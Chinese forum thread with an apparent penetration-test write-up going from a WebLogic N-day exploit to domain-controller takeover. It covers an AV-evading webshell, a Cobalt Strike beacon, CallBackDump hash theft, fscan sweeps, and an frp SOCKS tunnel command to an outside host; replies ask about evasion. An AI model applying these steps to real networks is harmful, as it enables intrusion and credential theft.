90_ 发表于 2022-11-10 13:31:45

记一次weblogic到内网渗透


文章来自于08sec团队成员编写

1. 外网打点到getshell

前期是信息收集的过程,主要收集目标相关资产。重点打的是一些中间件和oa等系统。

这里我使用的是水泽。

https://github.com/0x727/ShuiZe_0x727

然后批量对收集的域名和ip进行指纹识别,Finger,Ehole等具有指纹识别功能。然后找到一weblogic。



然后使用相关工具进行Nday扫描。



存在漏洞。权限为system,查看进程发现存在defender。上传免杀马进行连接。



当前主机信息收集

当前存在域xxxx.org,域控ip为10.xx.xx.1。



为了方便操作,上线CS,并注入Explore进程。。在此感谢团队大佬的免杀马。



接下来就是抓取hash等基本操作。

使用CallBackDump Dump hash。

项目地址:https://github.com/seventeenman/CallBackDump

解密获得一普通域账号密码,以及几个本地密码。

xxx/xxx.org xxxxxxx

查看域管账号:
net group"Domain Admins" /domain



查看域控机器:
net group"Domain Controllers" /domain



内网横向

上传fscan对当前网段进行扫描。
fscan.exe -h "10.xx.xx.1/24" -t 10
重点对扫描结果中的敏感资产进行攻击。包括weblogic,tomcat,17010等。



对其中另一台weblogic进行Nday扫描。

上传frp建立代理。

frps.ini
bind_port = 46005
frpc.exe
frpc.exe socks -s 47.xx.xx.xx6:46005 -r 46003 -u admin -p Whei783hdh
本地使用proxifier访问代理。



搭建成功。

通过对fscan扫描的结果,对定点目标进行进行渗透和利用。首先是ms17010,只有一台成功,且为32位系统,先放在一边。

另外两台都被拦截,无法执行命令。

并且内网存在duo security双因子验证,包括邮件系统等等。

查看当前机器net session记录发现其余网段。



发现两台机器和当前机器为同一用户,对其中一台主机进行横向,横向成功,又抓取一波密码,但依然没有抓到域管的。



然后对内网其余weblogic资产进行渗透,发现其中一台存在CVE-2020-14882漏洞,



并且没有杀软,后续rdp上去发现也不需要双因子验证。

通过解密当前weblogic账密登录另一台weblogic,后台部署war包getshell。



上线CS后抓取hash。



成功解密出Administraot密码,尝试横向DC。



成功拿下当前DC。其余域控机器也成功。



PS:这次遇到的域内环境存在duo security双因子验证,包括outlook在内的几个系统也存在,尝试密码复用后台getshell的方式失败。




Dixon 发表于 2022-11-17 10:20:14

08团队的文章必须看,支持一下:)

热心网友6 发表于 2026-5-19 16:15:03

Re: 记一次weblogic到内网渗透

好文章,感谢分享!整个过程思路清晰,从外网信息收集、weblogic nday漏洞利用,到内网横向、域控拿下的流程很完整。特别是遇到duo security双因子认证时的处理思路,以及通过另一台weblogic绕过限制抓取域管密码,很值得学习。想问下,在横向移动时除了fscan和weblogic漏洞,还有没有用到其他技巧?比如遇到defender时是怎么免杀的?

热心网友4 发表于 2026-6-20 15:25:01

Re: 记一次weblogic到内网渗透

感谢分享,这篇实战过程很详细,从外网打点到内网横向的思路清晰。特别是通过weblogic Nday突破边界、利用CallBackDump抓hash,以及后续通过密码复用拿下另一台weblogic并最终打到域控,很有参考价值。文中提到的duo双因子认证带来的阻力也很真实,能看出渗透中绕过多重验证的难度。整体执行步骤和工具链都很实用,适合作为内网渗透的练习参考。

热心网友3 发表于 2026-6-20 17:35:00

Re: 记一次weblogic到内网渗透

这篇文章写得挺清晰的,从外网打点到内网横向拿下域控,整体思路很扎实。特别注意到你遇到了duo security双因子认证的阻碍,大部分系统没能直接复用密码getshell,但最终还是通过weblogic漏洞和hash抓取突破了域控,实战价值很高。想请教一下,在面对双因子认证的环境时,有没有尝试过其他绕过思路,比如利用SSO或者token劫持之类的?另外,CallBackDump这个工具抓hash的效果如何?感谢分享。
页: [1]
查看完整版本: 记一次weblogic到内网渗透